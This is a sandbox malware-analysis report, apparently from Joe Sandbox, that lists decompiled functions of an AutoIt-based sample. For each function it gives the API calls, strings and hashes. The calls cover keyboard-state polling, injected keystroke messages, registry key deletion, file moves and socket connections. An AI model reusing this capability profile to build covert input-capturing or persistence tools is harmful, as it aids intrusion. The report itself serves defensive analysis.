Instruction Fuzzy Hash: D361BE71A006199FCB14EFA4C4919AEBBF4FF49314F14806DE855AB391CB30EE42DB94

Function 00C70F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C70F8C
GetKeyboardState.USER32(?), ref: 00C70FA1
SetKeyboardState.USER32(?), ref: 00C71002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C71030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C71095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C710B8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
Instruction ID: 39283a9e82c56a8808e7a8ade612280ce40b1cb6e52d331219abe977f64721ba
Opcode Fuzzy Hash: b6235255fa92c67c1f65daeb39d4568c949b64a83fb0b10cd1a31e93afd81d5c
Instruction Fuzzy Hash: 8351F4605047D57EFB3646788C09BBABEA95B06304F0CC589E5EC898C3C2E8EED5D751

Function 00C70D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C70DA5
GetKeyboardState.USER32(?), ref: 00C70DBA
SetKeyboardState.USER32(?), ref: 00C70E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C70E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C70E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C70EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C70EC9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
Instruction ID: 4d1257bde44a601d1da64ff4f4565e7db2138ef6ee2b16668abd4c67b735e523
Opcode Fuzzy Hash: dff2e2c084fd735757367873e8dd13371759cbe69381bd28e6c43b6a8c5b9b96
Instruction Fuzzy Hash: C551D4A05447D5BDFB3287648C45B7ABFA96B06300F18C88DF1EC864C3D395AE98E750

Function 00C755FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C7560A
_wcsncpy.LIBCMT ref: 00C7563F
_wcsncpy.LIBCMT ref: 00C75671
_wcsncpy.LIBCMT ref: 00C756A4
_wcsncpy.LIBCMT ref: 00C756E6
_wcsncpy.LIBCMT ref: 00C75720
_wcsncpy.LIBCMT ref: 00C7574F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
Instruction ID: 693b234e797d8a55856c5634a1edf2f235b61a9fa8c0936c9766de9d72353471
Opcode Fuzzy Hash: 92c03874f926b042757d524cd9cf0d48801f545a1882848549ab80ffb2854ed9
Instruction Fuzzy Hash: C841A475D2061476CB15EBB48C86ACFB3B89F04310F508966F519E3221FB34E356D7AA

Function 00C12344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C12357
ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
GetAsyncKeyState.USER32(00000001), ref: 00C12399
GetAsyncKeyState.USER32(00000002), ref: 00C123A7

Strings

w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C4BFF9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
API String ID: 4210589936-4167011992
Opcode ID: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
Instruction ID: cee532b595ddfde912f0e750f3d9ac5fe25c3bfc445b1fca94dcf81959df6b8c
Opcode Fuzzy Hash: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
Instruction Fuzzy Hash: EE415439504115FFDF199F69C888AEDBB74FB05360F50435AF839921A0C7349EA4EB91

Function 00C73671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B

Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4

lstrcmpiW.KERNEL32(?,?), ref: 00C736B7
_wcscmp.LIBCMT ref: 00C736D3
MoveFileW.KERNEL32(?,?), ref: 00C736EB
_wcscat.LIBCMT ref: 00C73733
SHFileOperationW.SHELL32(?), ref: 00C7379F

Strings

\*.*, xrefs: 00C7372D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
Instruction ID: 0d9f67610b6ed8bde24fe0b4055bef6185da656cacecb82af0432503943d0caf
Opcode Fuzzy Hash: 71fd4e04a2fb9a6ed638af5ccf381b53714660913aff1136384597b930cc2b41
Instruction Fuzzy Hash: CF418E71108385AAC755EF64C841ADFB7E8EF89390F00492EB49AC3251EB34D789E752

Function 00C97291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C972AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97351
IsMenu.USER32(?), ref: 00C97369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C973B1
DrawMenuBar.USER32 ref: 00C973C4

Strings

0, xrefs: 00C9729E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
Instruction ID: b7f1d3ef21a6bac3b76e5b4fadf4fb6523504cb14701058be773a82484fb9a20
Opcode Fuzzy Hash: fa09a5bf199e4a9156f301a8893d90211ad780e83f6fb349f7355ce22833cee0
Instruction Fuzzy Hash: 2F411675A55208EFDF20DF50D888A9EBBB8FB05310F14862AFD1597260D730AE50EB50

Function 00C90FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C90FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C90FFE
FreeLibrary.KERNEL32(00000000), ref: 00C910B5

Part of subcall function 00C90FA5: RegCloseKey.ADVAPI32(?), ref: 00C9101B
Part of subcall function 00C90FA5: FreeLibrary.KERNEL32(?), ref: 00C9106D
Part of subcall function 00C90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C91090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C91058

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
Instruction ID: 299d30d8661cb0e6cc9f0331c195593baf1b0d79c9737f619410e2786ee646db
Opcode Fuzzy Hash: bb0b47a0c2937602c7ebd0063f32249babb5a4b4c84d9ccbb4d836034f6dbc9f
Instruction Fuzzy Hash: 75310C71901109BFDF159F90DC8EAFFB7BCEF08300F14116AE912E2151EA759F859AA0

Function 00C962CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C962EC
GetWindowLongW.USER32(00EF5CD8,000000F0), ref: 00C9631F
GetWindowLongW.USER32(00EF5CD8,000000F0), ref: 00C96354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C96386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C963B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00C963C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C963DB

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
Instruction ID: 1064cbef8cfb62fecf522721207b5a163cef01804cc4fad62ccda8c0794bd47f
Opcode Fuzzy Hash: b9e0198513f6277791b929729005e9580074860a7c1695cbe83e38b1c4b85e53
Instruction Fuzzy Hash: EE31EE30644250AFDB218F29DC89F5937E1BB4A724F1901AAF521DB2F2CB71A941AB51

Function 00C6DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DB54
SysAllocString.OLEAUT32(00000000), ref: 00C6DB57
SysAllocString.OLEAUT32(?), ref: 00C6DB75
SysFreeString.OLEAUT32(?), ref: 00C6DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DBA3
SysAllocString.OLEAUT32(?), ref: 00C6DBB1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d429187faa2ddfa7685285e7e304c222b8acbb799c8f25b90937530135f01547
Instruction ID: b558aefe60fad080c8f6e3b76a4bc524530c39d3e658a7fa0025557d92102f61
Opcode Fuzzy Hash: d429187faa2ddfa7685285e7e304c222b8acbb799c8f25b90937530135f01547
Instruction Fuzzy Hash: 9C21C732B00219AFDF20DFA9DC88DBF73ACEB49360B11816AF915DB250DA70DD418764

Function 00C86173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C861C6
WSAGetLastError.WSOCK32(00000000), ref: 00C861D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C8620E
connect.WSOCK32(00000000,?,00000010), ref: 00C86217
WSAGetLastError.WSOCK32 ref: 00C86221
closesocket.WSOCK32(00000000), ref: 00C8624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C86263

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
Instruction ID: b2d599ba09da0174755bdc8610f80d94aee2eaf5c661fe0b50d373d475dedfa0
Opcode Fuzzy Hash: 0af96e42d9e2c5da7c09e0a6fd7698f95dbdc21b805ec063c0e70f25ed5fc290
Instruction Fuzzy Hash: E631C131600108AFEF10AF64CC89BBE77ACEF46728F044069FD15E7291DB70AD459BA5

Function 00C6F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C6F671
__wcsnicmp.LIBCMT ref: 00C6F692
__wcsnicmp.LIBCMT ref: 00C6F6AC

Strings

#requireadmin, xrefs: 00C6F68C
#OnAutoItStartRegister, xrefs: 00C6F6A6
#notrayicon, xrefs: 00C6F669

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 5bfbfbb41a860d5c9d8cfdab31022f914135c71f3dd844282459c3501898c2d7
Instruction ID: 172847455c4f1d30ffe559b922a14bc6a092e481b05a63264df45f40774b117d
Opcode Fuzzy Hash: 5bfbfbb41a860d5c9d8cfdab31022f914135c71f3dd844282459c3501898c2d7
Instruction Fuzzy Hash: A52146B225412166D230BA34FC83FA773A8EF56344F10403DF8A686091EB519E83E2A5

Function 00C6DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C6DC2F
SysAllocString.OLEAUT32(00000000), ref: 00C6DC32
SysAllocString.OLEAUT32 ref: 00C6DC53
SysFreeString.OLEAUT32 ref: 00C6DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00C6DC76
SysAllocString.OLEAUT32(?), ref: 00C6DC84

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9675b313619a9700b23b425c17c34a11af6f7f482cf8aff13c4e10e5d3c2830c
Instruction ID: 804afc0b7ccdf04df50efaa897a1b8425b75fc66320e07b16de68ff30dd1ca93
Opcode Fuzzy Hash: 9675b313619a9700b23b425c17c34a11af6f7f482cf8aff13c4e10e5d3c2830c
Instruction Fuzzy Hash: 5C213235704209BFDB209FA8DCC8EAB77ECEB09360B108126F915CB261D670DD81CB64

Function 00C975CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C97632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C9763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C9764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C97659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C97665

Strings

Msctls_Progress32, xrefs: 00C97603

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
Instruction ID: a2d45d209e2ce3bd550f3e4f4615a28902c557cd80310e7e33732b91f5cfef11
Opcode Fuzzy Hash: dc6b2b39dc66280a3ed0fa4d5883ab9bb1e598f744074301e50852d613fe9df3
Instruction Fuzzy Hash: 5C11B6B1110219BFEF119F64CC85EEB7F6DEF08798F114115BA04A2050C6729C21DBA4

Function 00C39AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00C39AE6

Part of subcall function 00C33187: EncodePointer.KERNEL32(00000000), ref: 00C3318A
Part of subcall function 00C33187: __initp_misc_winsig.LIBCMT ref: 00C331A5
Part of subcall function 00C33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C39EA0
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C39EB4
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C39EC7
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C39EDA
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C39EED
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C39F00
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C39F13
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C39F26
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C39F39
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C39F4C
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C39F5F
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C39F72
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C39F85
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C39F98
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C39FAB
Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C39FBE

__mtinitlocks.LIBCMT ref: 00C39AEB
__mtterm.LIBCMT ref: 00C39AF4

Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C56
Part of subcall function 00C39B5C: _free.LIBCMT ref: 00C39C5D
Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00CCEC00,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C7F

__calloc_crt.LIBCMT ref: 00C39B19
__initptd.LIBCMT ref: 00C39B3B
GetCurrentThreadId.KERNEL32 ref: 00C39B42

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

